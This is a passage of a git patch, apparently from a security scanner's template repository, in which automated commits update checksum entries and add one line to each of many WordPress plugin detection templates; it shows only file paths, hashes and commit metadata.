-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6489,7 +6492,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:7cf3279a616bc016df53e76f2cd94379618ddb20 +templates-checksum.txt:399b728b87a1ac1824146319621c48ac9c65225b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 2900b6090bed1e04c284491bcf62be813e6ad67a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 05:09:27 +0000 Subject: [PATCH 318/609] TemplateMan Update [Tue Jul 4 05:09:27 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + 